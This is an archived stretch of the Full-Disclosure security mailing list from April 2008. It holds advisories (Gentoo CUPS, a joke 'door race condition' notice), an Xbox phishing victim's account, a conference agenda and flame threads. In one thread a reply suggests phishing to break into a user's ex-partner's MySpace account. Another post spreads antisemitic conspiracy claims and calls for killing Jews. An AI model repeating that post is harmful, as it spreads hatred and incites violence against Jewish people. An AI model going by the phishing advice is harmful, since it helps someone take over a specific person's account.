For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iQEVAwUBR/HphGz0hbPcukPfAQIMhwgAlfBtUv2OIG9pd6b26OpGwV2zzXL7J23s
TCokCtRNFuzH/KhWIN/c1j8N9sZda6EwsKSQtP7VIsGFCOW0iSOMcnf5uxHnP2kl
m9+pPNn+HOBnqEU3Mj4f74rmpV/7d5yBnn20ap8IwGVjoYIqYJcPFnQrFEuNfFYY
tOaP+M74btA9eINtvx2f9HpVnjyMcM9DpVhhvU+yu52sOWvNYtLL9WqakvUI74CF
OcjpnHnLgWmcp6t++m2GpIj4YmsupWSJED6HhQDU+KphJTH89EnyFoDlj5Oyu8fL
ax+JH27yqvy1b9M0TvLpV18ewPM6fCBdy9kvLDgOrbGh0N/WqzhbfQ==
=qSYx
-----END PGP SIGNATURE-----


From lassiterxavier at yahoo.com  Tue Apr  1 00:58:12 2008
From: lassiterxavier at yahoo.com (Xavier lassiter)
Date: Mon, 31 Mar 2008 16:58:12 -0700 (PDT)
Subject: [Full-disclosure]  Xbox live accounts are being stolen (update)
Message-ID: <672631.87889.qm@web63011.mail.re1.yahoo.com>

Hi My Name Is Xavier And You said to send you any 
info on Hacked Xbox live accounts just like to tell you my account was also 
Hacked since Wednesday march 26th 2008 I been talking to Xbox for two weeks now 
its march 31st well me and two of my friends accounts got stolen by my friend 
giving me this web site for free Microsoft Points like (Excuse me for my langue) 
Like a Fucking Dumb ass I went to the web site I looks just like a Xbox web site 
here is a link www.freempz.110mb.com when you look at the website it looks so real so I put in my e-mail address and password just like Xbox.com and it signed me in nothing happened so I got of my computer and went on my Xbox and a few minutes later I get a friend request from another person it was my friend and he told me not to go to that web site because they took his information when he told me that I went to change my information it was to late the email was changed and the password so what I did was I was going to stay on but it kicked me of I did not say I singed off but I tried to sign back in it said that my account was recovered so I called Xbox im going to try to remember everything ok I called them and I told them my account was stolen they did not know what the hell I was talking about after I spent  Five minutes explaining to them that my account was stolen so they man I was talking to asked me for the gamertag Xman1231 they they asked me
 what was the address oh and this is on the first day and he asked me what was my secret password what was my pets name first I said I don?t have a pet and I told him that I put my favorite food and I told  him that everything was changed my address name last name everything they that?s when the guy got what the hell I was talking about it would been good if I wrote there names down but I did not let me get back the subject at hand ok then they put me on hold and then they put me on hold again and that?s when they put me in contact with the supervisor Matt I talked to him and everything and he said that he can suspend the account oh while this was happening they puck ass hacker was on my account but the I told they guy everything I told the man I was talking to that was they supervisor told me they will be in contact with me at the end of this week or next week in my mind I know there not going to call but they supervisor told me that I can make
 another account while I wait for there call he gave me a reference number and I got off the phone and I made a new account and I was thinking that can they just remove the email address and pass word that's there and add a new one but it was to late to call I apologize for my writing and thank you for reading this e-mail. if any question to asked you can contact me at my e-mail address  lassiterxavier at yahoo.com  





      ____________________________________________________________________________________
You rock. That's why Blockbuster's offering you one month of Blockbuster Total Access, No Cost.  
http://tc.deals.yahoo.com/tc/blockbuster/text5.com
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080331/f3f8d060/attachment.html 

From druid at caughq.org  Tue Apr  1 18:27:05 2008
From: druid at caughq.org (I)ruid)
Date: Tue, 01 Apr 2008 12:27:05 -0500
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door
	Race	Condition
In-Reply-To: <a298f4f70804010658m151e7aeft76ab3cff66073be8@mail.gmail.com>
References: <1207026022.3142.287.camel@localhost>
	<997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>
	<a298f4f70804010658m151e7aeft76ab3cff66073be8@mail.gmail.com>
Message-ID: <1207070825.3142.293.camel@localhost>

On Tue, 2008-04-01 at 08:58 -0500, evilrabbi wrote:
> Why would you realease something like this without telling the vendor?
> What you did is irresponsible.

That is /exactly/ correct:

http://www.caughq.org/advisories/disclosure.html

-- 
I)ruid, C?ISSP
druid at caughq.org
http://druid.caughq.org
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/e9db127e/attachment.bin 

From Valdis.Kletnieks at vt.edu  Tue Apr  1 18:34:03 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Tue, 01 Apr 2008 13:34:03 -0400
Subject: [Full-disclosure] Xbox live accounts are being stolen (update)
In-Reply-To: Your message of "Mon, 31 Mar 2008 16:58:12 PDT."
	<672631.87889.qm@web63011.mail.re1.yahoo.com>
References: <672631.87889.qm@web63011.mail.re1.yahoo.com>
Message-ID: <6380.1207071243@turing-police.cc.vt.edu>

On Mon, 31 Mar 2008 16:58:12 PDT, Xavier lassiter said:
> info on Hacked Xbox live accounts just like to tell you my account was also 
> Hacked since Wednesday march 26th 2008 I been talking to Xbox for two weeks now

So you've been talking to them for two weeks about something that happened
less than a week ago.

Moral: If you don't even know what day of the week it is, you probably shouldn't
be using the Internet.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/c307bd58/attachment.bin 

From blah at blakogre.com  Tue Apr  1 19:13:58 2008
From: blah at blakogre.com (blah)
Date: Tue, 1 Apr 2008 11:13:58 -0700
Subject: [Full-disclosure] Xbox live accounts are being stolen (update)
In-Reply-To: <672631.87889.qm@web63011.mail.re1.yahoo.com>
References: <672631.87889.qm@web63011.mail.re1.yahoo.com>
Message-ID: <28f529ba0804011113l3720982cq90feba4b94eb1e2d@mail.gmail.com>

I'd like to introduce you to a new friend you haven't met before:

http://images.jupiterimages.com/common/detail/80/16/22421680.jpg

"march 26th 2008 I been talking to Xbox for two weeks now its march 31st "

Hacked 3/26.  Now 3/31.  2 weeks?

Here:
http://www.amazon.com/Subtraction-Flash-Cards-Pack-54/dp/0307249522/ref=pd_bbs_sr_1?ie=UTF8&s=books&qid=1207073496&sr=8-1

All of that aside, hope you get things restored.

2008/3/31 Xavier lassiter <lassiterxavier at yahoo.com>:
>
>
> Hi My Name Is Xavier And You said to send you any info on Hacked Xbox live
> accounts just like to tell you my account was also Hacked since Wednesday
> march 26th 2008 I been talking to Xbox for two weeks now its march 31st well
> me and two of my friends accounts got stolen by my friend giving me this web
> site for free Microsoft Points like (Excuse me for my langue) Like a Fucking
> Dumb ass I went to the web site I looks just like a Xbox web site here is a
> link www.freempz.110mb.com when you look at the website it looks so real so
> I put in my e-mail address and password just like Xbox.com and it signed me
> in nothing happened so I got of my computer and went on my Xbox and a few
> minutes later I get a friend request from another person it was my friend
> and he told me not to go to that web site because they took his information
> when he told me that I went to change my information it was to late the
> email was changed and the password so what I did was I was going to stay on
> but it kicked me of I did not say I singed off but I tried to sign back in
> it said that my account was recovered so I called Xbox im going to try to
> remember everything ok I called them and I told them my account was stolen
> they did not know what the hell I was talking about after I spent  Five
> minutes explaining to them that my account was stolen so they man I was
> talking to asked me for the gamertag Xman1231 they they asked me what was
> the address oh and this is on the first day and he asked me what was my
> secret password what was my pets name first I said I don't have a pet and I
> told him that I put my favorite food and I told  him that everything was
> changed my address name last name everything they that's when the guy got
> what the hell I was talking about it would been good if I wrote there names
> down but I did not let me get back the subject at hand ok then they put me
> on hold and then they put me on hold again and that's when they put me in
> contact with the supervisor Matt I talked to him and everything and he said
> that he can suspend the account oh while this was happening they puck ass
> hacker was on my account but the I told they guy everything I told the man I
> was talking to that was they supervisor told me they will be in contact with
> me at the end of this week or next week in my mind I know there not going to
> call but they supervisor told me that I can make another account while I
> wait for there call he gave me a reference number and I got off the phone
> and I made a new account and I was thinking that can they just remove the
> email address and pass word that's there and add a new one but it was to
> late to call I apologize for my writing and thank you for reading this
> e-mail. if any question to asked you can contact me at my e-mail address
> lassiterxavier at yahoo.com
>
> ________________________________
> OMG, Sweet deal for Yahoo! users/friends: Get A Month of Blockbuster Total
> Access, No Cost. W00t
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: images.jpg
Type: image/jpeg
Size: 2422 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/a2dfc991/attachment-0001.jpg 

From rbu at gentoo.org  Tue Apr  1 20:17:06 2008
From: rbu at gentoo.org (Robert Buchholz)
Date: Tue, 1 Apr 2008 21:17:06 +0200
Subject: [Full-disclosure] [ GLSA 200804-01 ] CUPS: Multiple vulnerabilities
Message-ID: <200804012117.06507.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200804-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: CUPS: Multiple vulnerabilities
      Date: April 01, 2008
      Bugs: #211449, #212364, #214068
        ID: 200804-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been discovered in CUPS, allowing for the
remote execution of arbitrary code and a Denial of Service.

Background
==========

CUPS provides a portable printing layer for UNIX-based operating
systems.

Affected packages
=================

    -------------------------------------------------------------------
     Package         /   Vulnerable   /                     Unaffected
    -------------------------------------------------------------------
  1  net-print/cups      < 1.2.12-r7                      >= 1.2.12-r7

Description
===========

Multiple vulnerabilities have been reported in CUPS:

* regenrecht (VeriSign iDefense) discovered that the
  cgiCompileSearch() function used in several CGI scripts in CUPS'
  administration interface does not correctly calculate boundaries when
  processing a user-provided regular expression, leading to a
  heap-based buffer overflow (CVE-2008-0047).

* Helge Blischke reported a double free() vulnerability in the
  process_browse_data() function when adding or removing remote shared
  printers (CVE-2008-0882).

* Tomas Hoger (Red Hat) reported that the gif_read_lzw() function
  uses the code_size value from GIF images without properly checking
  it, leading to a buffer overflow (CVE-2008-1373).

* An unspecified input validation error was discovered in the HP-GL/2
  filter (CVE-2008-0053).

Impact
======

A local attacker could send specially crafted network packets or print
jobs and possibly execute arbitrary code with the privileges of the
user running CUPS (usually lp), or cause a Denial of Service. The
vulnerabilities are exploitable via the network when CUPS is sharing
printers remotely.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All CUPS users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-print/cups-1.2.12-r7"

References
==========

  [ 1 ] CVE-2008-0047
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0047
  [ 2 ] CVE-2008-0053
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0053
  [ 3 ] CVE-2008-0882
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0882
  [ 4 ] CVE-2008-1373
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1373

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200804-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part.
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/afb4bed8/attachment.bin 

From codyroby at hotmail.com  Tue Apr  1 20:31:38 2008
From: codyroby at hotmail.com (Cody Roby)
Date: Tue, 1 Apr 2008 15:31:38 -0400
Subject: [Full-disclosure] (no subject)
Message-ID: <BLU118-W20B1CCA9521FD8CB98190BD8F50@phx.gbl>


Alright i have a crazy ex who keeps posting malicous things about me on her myspace and i would like to know how to use html errors to hack her myspace, i saw a previous post, but the code has been removed. please help.
_________________________________________________________________
Pack up or back up?use SkyDrive to transfer files or keep extra copies. Learn how.
hthttp://www.windowslive.com/skydrive/overview.html?ocid=TXT_TAGLM_WL_Refresh_skydrive_packup_042008
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/0be6d132/attachment.html 

From mastahflank at gmail.com  Tue Apr  1 20:50:36 2008
From: mastahflank at gmail.com (=?utf-8?B?am9zaA==?=)
Date: Tue, 1 Apr 2008 19:50:36 +0000
Subject: [Full-disclosure] (no subject)
In-Reply-To: <BLU118-W20B1CCA9521FD8CB98190BD8F50@phx.gbl>
References: <BLU118-W20B1CCA9521FD8CB98190BD8F50@phx.gbl>
Message-ID: <715747295-1207079441-cardhu_decombobulator_blackberry.rim.net-472956415-@bxe032.bisx.prod.on.blackberry>

Can you sue for slander? And probably a simple phishing techique would work against her.
Sent from my BlackBerry? smartphone with SprintSpeed

-----Original Message-----
From: Cody Roby <codyroby at hotmail.com>

Date: Tue, 1 Apr 2008 15:31:38 
To:<full-disclosure at lists.grok.org.uk>
Subject: [Full-disclosure] (no subject)


Alright i have a crazy ex who keeps posting malicous things about me on her myspace and i would like to know how to use html errors to hack her myspace, i saw a previous post, but the code has been removed. please help.

----------------
Pack up or back up?use SkyDrive to transfer files or keep extra copies. Learn how. _______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

From groffg at gmgdesign.com  Tue Apr  1 21:05:38 2008
From: groffg at gmgdesign.com (Garrett M. Groff)
Date: Tue, 1 Apr 2008 16:05:38 -0400
Subject: [Full-disclosure] (no subject)
References: <BLU118-W20B1CCA9521FD8CB98190BD8F50@phx.gbl>
	<715747295-1207079441-cardhu_decombobulator_blackberry.rim.net-472956415-@bxe032.bisx.prod.on.blackberry>
Message-ID: <00b601c89433$c334cec0$336b880a@softpro.corp>

Another approach is that you could stop reading her blog and seek an 
alternate past-time(s). That would avoid the commission of computer crime 
and its possible ramifications.

- G



----- Original Message ----- 
From: "josh" <mastahflank at gmail.com>
To: "Cody Roby" <codyroby at hotmail.com>; 
<full-disclosure-bounces at lists.grok.org.uk>; 
<full-disclosure at lists.grok.org.uk>
Sent: Tuesday, April 01, 2008 3:50 PM
Subject: Re: [Full-disclosure] (no subject)


Can you sue for slander? And probably a simple phishing techique would work 
against her.
Sent from my BlackBerry? smartphone with SprintSpeed

-----Original Message-----
From: Cody Roby <codyroby at hotmail.com>

Date: Tue, 1 Apr 2008 15:31:38
To:<full-disclosure at lists.grok.org.uk>
Subject: [Full-disclosure] (no subject)


Alright i have a crazy ex who keeps posting malicous things about me on her 
myspace and i would like to know how to use html errors to hack her myspace, 
i saw a previous post, but the code has been removed. please help.

----------------
Pack up or back up?use SkyDrive to transfer files or keep extra copies. 
Learn how. _______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


From xploitable at gmail.com  Tue Apr  1 21:59:43 2008
From: xploitable at gmail.com (n3td3v)
Date: Tue, 1 Apr 2008 21:59:43 +0100
Subject: [Full-disclosure] sans handler gives out n3td3v e-mail to public
In-Reply-To: <20605.1206932416@turing-police.cc.vt.edu>
References: <mailman.702.1206122051.10081.full-disclosure@lists.grok.org.uk>
	<200803211614.11815.atlas@r4780y.com>
	<4b6ee9310803221427s289092b1x5066e5f7ff61e17e@mail.gmail.com>
	<b25f08e40803230344g2dc116efn7a57d19ecbc5099f@mail.gmail.com>
	<4b6ee9310803291008s459baecexd33b982871045cf8@mail.gmail.com>
	<20605.1206932416@turing-police.cc.vt.edu>
Message-ID: <4b6ee9310804011359g6e827222o2cce826c2e18cda0@mail.gmail.com>

On Mon, Mar 31, 2008 at 4:00 AM,  <Valdis.Kletnieks at vt.edu> wrote:
> On Sat, 29 Mar 2008 17:08:43 -0000, n3td3v said:
>
>  > Why are they announcing podcasts when both Joel Esler and Johannes
>  > Ullrich have a privacy breach still to publically acknowledge and
>  > apologize for?
>
>  Umm.. maybe because, despite what you may think, your little pissing contest
>  with Joel and Johannes doesn't qualify as a "oh my ghod, let's drop *everything*
>  and shut down the entire workflow and not do a single damned thing until this
>  issue is resolved".

They aren't busy or getting on with business, they have obviously
snubbed the n3td3v agenda.

Joel Esler is back on duty,
http://isc.sans.org/diary.html?storyid=4225 he obviously hasn't been
sacked and he is talking about April Fools Day.

I'm mighty angry,

n3td3v


From gluttony at gmail.com  Wed Apr  2 00:21:55 2008
From: gluttony at gmail.com (Andrew A)
Date: Tue, 1 Apr 2008 16:21:55 -0700
Subject: [Full-disclosure] Greedy Jews fact of the day
Message-ID: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com>

"And it shall be, when the LORD thy God shall bring thee into the land which
He swore unto thy fathers, to Abraham, to Isaac, and to Jacob, to give
thee--great and goodly cities, which thou didst not build, and houses full
of all good things, which thou didst not fill, and cisterns hewn out, which
thou didst not hew, vineyards and olive-trees, which thou didst not plant,
and thou shalt eat and be satisfied."

These verses from Deuteronomy chapter 6 are written on a piece of parchment
and placed in a box which is hung outside the house of every Jew that keeps
the covenant.

And so they have accomplished, in the United States of America. The subprime
crises and resulting bailouts (at our expense by our national reserve bank,
which is headed by an Orthodox Jew serving a board of Orthodox Jews) are
going to create thousands of empty homes and plots of arable land owned by
investment banking institutions that are owned exclusively by Orthodox Jews.

Why should we leave a single follower of such a filthy, greedy religion
alive? Do any of you have an idea?

I pray to you, the Lord my God, to help me destroy the Jewish meme. Every
single follower of this arrogant and horrible idea should have their gold
exchanged for flying pieces of lead and steel. Let the Jews take what they
have reaped and sown-- death, destruction and hatred.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/fe4e5925/attachment.html 

From groffg at gmgdesign.com  Tue Apr  1 15:44:27 2008
From: groffg at gmgdesign.com (Garrett M. Groff)
Date: Tue, 1 Apr 2008 10:44:27 -0400
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door
	RaceCondition
References: <1207026022.3142.287.camel@localhost><997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>
	<a298f4f70804010658m151e7aeft76ab3cff66073be8@mail.gmail.com>
Message-ID: <002901c89406$e3c5e110$336b880a@softpro.corp>

Although, in all seriousness, I can imagine "physical world" things being compromised, possibly via software attacks alone (or, equally likely, a single disgruntled employee). Allow me to explain using a particular example: safes. 

Companies that make safes (be they old-fashioned mechanical or electronic) often have records of their combinations corresponding to a unique serial number for each safe. Yes, they have an electronic database of all the combinations for all their safes. In the case of electronic safes, this combination is often un-changeable; the user of the safe can use that factory default code initially to create a "user combination" that can open the safe, but can later be changed (if you wish to disallow that user access later on). Anyway, the factory default combination can't be changed and is in a database somewhere. This presents a convenience on the part of the business that produces the safes (avoids angry customers who are locked out of their safes) but reduces security for all users of that company's products.

I understand the business case for keeping records of all combinations for all safes, but the downside is security in the event that that list/database is ever leaked.

- G

  ----- Original Message ----- 
  From: evilrabbi 
  To: Nate McFeters 
  Cc: full-disclosure at lists.grok.org.uk ; bugtraq at securityfocus.com 
  Sent: Tuesday, April 01, 2008 9:58 AM
  Subject: Re: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door RaceCondition


  Why would you realease something like this without telling the vendor? What you did is irresponsible.



  On Tue, Apr 1, 2008 at 12:18 AM, Nate McFeters <nate.mcfeters at gmail.com> wrote:

    Hahaha, nice find.


    On 4/1/08, I)ruid <druid at caughq.org> wrote: 
                           ____      ____     __    __
                          /    \    /    \   |  |  |  |
             ----====####/  /\__\##/  /\  \##|  |##|  |####====----
                        |  |      |  |__|  | |  |  |  |
                        |  |  ___ |   __   | |  |  |  |
      ------======######\  \/  /#|  |##|  |#|  |##|  |######======------
                          \____/  |__|  |__|  \______/


                         Computer Academic Underground
                             http://www.caughq.org
                               Security Advisory

      ===============/========================================================
      Advisory ID:    CAU-2008-0001
      Release Date:   04/01/2008
      Title:          Slowly Closing Door Race Condition
      Application/OS: Physical Structures
      Topic:          Physical structures employing exit doors with locks
                     are vulnerable to a race condition.
      Vendor Status:  Not Notified
      Attributes:     Physical, Race Condition
      Advisory URL:   http://www.caughq.org/advisories/CAU-2008-0001.txt
      Author/Email:   CAU <advisories (at) caughq.org>
      ===============/========================================================

      Overview
      ========

      Physical structures which employ automatically locking doors to secure
      exit points expose a race condition which may allow unauthorized entry.


      Impact
      ======

      Malicious outsiders may be able to enter a structure via an exit point.

      Exit points may additionally provide an exit from a secure area of the
      structure, allowing an outsider entering through the exit point to gain
      direct access to the secure area.


      Affected Systems
      ================

      Physical structures which employ automatically locking doors at exit
      points of the structure.


      Technical Explanation
      =====================

      An exit's lock[1] generally converts a two-way door into a one-way
      door, allowing a person to traverse the door's threshold in one
      direction but not in the other.  These types of locks are used to
      secure exit points of structures so that people may exit via the door
      but not re-enter without disabling the lock through force or
      authentication.

      When a person exits the structure through an exit point which is
      secured by such a mechanism, a race condition exists wherein a
      malicious outsider may be able to reach the door and enter through it
      before it closes and locks itself.

      Many doors, especially heavier ones, also employ closing mechanisms[2]
      which are designed to cause the door to close slowly so as not to slam
      the door shut and damage the door frame, or damage any human appendage
      which may be in between the door and it's frame.  Such closing
      mechanisms can greatly increase the amount of time that the race
      condition exists.


      Solution & Recommendations
      ==========================

      1) Always ensure that personnel exiting an exit door wait outside the
        door until it has completely closed and locked before walking
        away.

      2) Employ a double door system such as is used in an air-lock where
        the interior door must be secured prior to the exterior door being
        allowed to open.


      Exploitation
      ============

      First identify the exit point that you want to exploit.  Stand at a
      safe distance during a high-traffic time and watch for people to use
      the exit point.  Time how long it takes for the door to close and
      lock itself when someone traverses the exit point.

      Next, identify a safe hiding place near the exit point, preferably
      in a direction that would be behind a person exiting the door, but
      which is within a distance to the exit point which you could traverse
      in under the door's closing time at a brisk pace or run.

      Finally, hide in this location during a lower traffic time and wait
      for someone to utilize the exit point.  After they have exited the
      door and are walking away, run to the door and enter before it has
      closed and locked.  Extra points are awarded for a spectacular dive
      and/or roll to catch the door at the very last second.


      References
      ==========

      [1] http://en.wikipedia.org/wiki/Lock_%28device%29
      [2] http://en.wikipedia.org/wiki/Door_closer


      Credits & Gr33ts
      ================

      Theodor Geisel, AHA!, NMRC, Uninformed Journal, dc214


      --
      I)ruid, C?ISSP
      druid at caughq.org
      http://druid.caughq.org


      _______________________________________________
      Full-Disclosure - We believe in it.
      Charter: http://lists.grok.org.uk/full-disclosure-charter.html
      Hosted and sponsored by Secunia - http://secunia.com/




    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/




  -- 
  -- h0 h0 h0 --
  www.nopsled.net 


------------------------------------------------------------------------------


  _______________________________________________
  Full-Disclosure - We believe in it.
  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  Hosted and sponsored by Secunia - http://secunia.com/
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/f0328583/attachment.html 

From Valdis.Kletnieks at vt.edu  Wed Apr  2 01:06:17 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Tue, 01 Apr 2008 20:06:17 -0400
Subject: [Full-disclosure] Greedy Jews fact of the day
In-Reply-To: Your message of "Tue, 01 Apr 2008 16:21:55 PDT."
	<1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com>
References: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com>
Message-ID: <29471.1207094777@turing-police.cc.vt.edu>

On Tue, 01 Apr 2008 16:21:55 PDT, Andrew A said:

> Why should we leave a single follower of such a filthy, greedy religion
> alive? Do any of you have an idea?

You're just sore because they thought of the meme "All the riches rightfully
belong to those of our religion" before your religion did...
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/42452034/attachment.bin 

From erey at ernw.de  Wed Apr  2 01:20:11 2008
From: erey at ernw.de (Enno Rey)
Date: Wed, 2 Apr 2008 02:20:11 +0200
Subject: [Full-disclosure] Troopers08 Security Conference,
	April 23/24 (Munich/Germany)
Message-ID: <20080402002011.GF2235@ws25.ernw.de>

Troopers08 Presentations
========================

Keynote on "Invulnerable Software" - Dan Bernstein

KIDS - Kernel Intrusion Detection System - Rodrigo Branco

State of Security - Andrew Cushman, Microsoft

Release of the next revision of the free Exploit-Me series of application penetration testing tools - Nish Bhalla, Security Compass

Side Channel Analysis - Job de Haas, Riscure

Hackertools according to German law (? 202c StGB) - Horst Speichert, Lawyer

Hardening Oracle in Corporate Environments - Alexander Kornbrust, Red-Database-Security

Virtualization: There is no spoon - Michael Kemp

Straight Talk about Cryptography - Jon Callas, PGP

Evilgrade: You have pending upgrades - Francisco Amato

"Self defending networks" - hype or essential need for international organisations? - Rolf Strehle, VOITH AG

Keynote "Virtualization: Floor Wax, Dessert Topping and The End of Information Security As We Know It?" - Christopher Hoff, Unisys

GPUs, password recovery and thunder tables - Andrey Belenko, ElcomSoft

Incident Management - tasks and organization. - Volker Kozok, German Ministry of Defense

A penetration testing learning kit - Ariel Waissbein, Core Security

Organizing and analyzing logdata with entropy - Sergey Bratus, Dartmouth College

Hacking Second Life(TM) - Michael Thumann, ERNW GmbH

Enterprise Webapplication Security Strategy at Allianz S.E., Dr. Johannes Raab, Allianz S.E.

Tapping $$$ Enterprises - Pierre Kroma

Virtual Honey Pots - Thorsten Holz, Universitaet Mannheim

SCADA and National Critical Infrastructures: is security an "optional"? - Raoul Chiesa

Data Loss Protection - Hope or Hype? - Enno Rey & Angus Blitter


--

Additional Pre-Con Latenight Talks
Packet Wars
Evening Fun

--
thanks,

Enno Rey
-- 
Enno Rey

Check out www.troopers08.org!


ERNW GmbH - Breslauer Str. 28 - 69124 Heidelberg - www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 173 6745902
PGP FP 055F B3F3 FE9D 71DD C0D5  444E C611 033E 3296 1CC1

Handelsregister Heidelberg: HRB 7135
Geschaeftsfuehrer: Roland Fiege, Enno Rey


From tbiehn at gmail.com  Wed Apr  2 01:28:57 2008
From: tbiehn at gmail.com (T Biehn)
Date: Tue, 1 Apr 2008 20:28:57 -0400
Subject: [Full-disclosure] Greedy Jews fact of the day
In-Reply-To: <29471.1207094777@turing-police.cc.vt.edu>
References: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com>
	<29471.1207094777@turing-police.cc.vt.edu>
Message-ID: <2d6724810804011728h137f0b24p1a586a5b21eca9d3@mail.gmail.com>

Valdis,
Never took you for a anti-Semite.

On Tue, Apr 1, 2008 at 8:06 PM,  <Valdis.Kletnieks at vt.edu> wrote:
> On Tue, 01 Apr 2008 16:21:55 PDT, Andrew A said:
>
>  > Why should we leave a single follower of such a filthy, greedy religion
>  > alive? Do any of you have an idea?
>
>  You're just sore because they thought of the meme "All the riches rightfully
>  belong to those of our religion" before your religion did...
>
> _______________________________________________
>  Full-Disclosure - We believe in it.
>  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>  Hosted and sponsored by Secunia - http://secunia.com/
>


From kurt.buff at gmail.com  Wed Apr  2 01:36:58 2008
From: kurt.buff at gmail.com (Kurt Buff)
Date: Tue, 1 Apr 2008 17:36:58 -0700
Subject: [Full-disclosure] Greedy Jews fact of the day
In-Reply-To: <2d6724810804011728h137f0b24p1a586a5b21eca9d3@mail.gmail.com>
References: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com>
	<29471.1207094777@turing-police.cc.vt.edu>
	<2d6724810804011728h137f0b24p1a586a5b21eca9d3@mail.gmail.com>
Message-ID: <a9f4a3860804011736l4f0e2d3eg4e2ff7301c8b32a0@mail.gmail.com>

And after that message, you still shouldn't. Parse it a bit more carefully...

On Tue, Apr 1, 2008 at 5:28 PM, T Biehn <tbiehn at gmail.com> wrote:
> Valdis,
>  Never took you for a anti-Semite.
>
>
>
>  On Tue, Apr 1, 2008 at 8:06 PM,  <Valdis.Kletnieks at vt.edu> wrote:
>  > On Tue, 01 Apr 2008 16:21:55 PDT, Andrew A said:
>  >
>  >  > Why should we leave a single follower of such a filthy, greedy religion
>  >  > alive? Do any of you have an idea?
>  >
>  >  You're just sore because they thought of the meme "All the riches rightfully
>  >  belong to those of our religion" before your religion did...
>  >
>  > _______________________________________________
>  >  Full-Disclosure - We believe in it.
>  >  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>  >  Hosted and sponsored by Secunia - http://secunia.com/
>  >
>
>  _______________________________________________
>  Full-Disclosure - We believe in it.
>  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>  Hosted and sponsored by Secunia - http://secunia.com/
>


From prb at lava.net  Wed Apr  2 01:47:07 2008
From: prb at lava.net (Peter Besenbruch)
Date: Tue, 1 Apr 2008 14:47:07 -1000
Subject: [Full-disclosure] Greedy Jews fact of the day
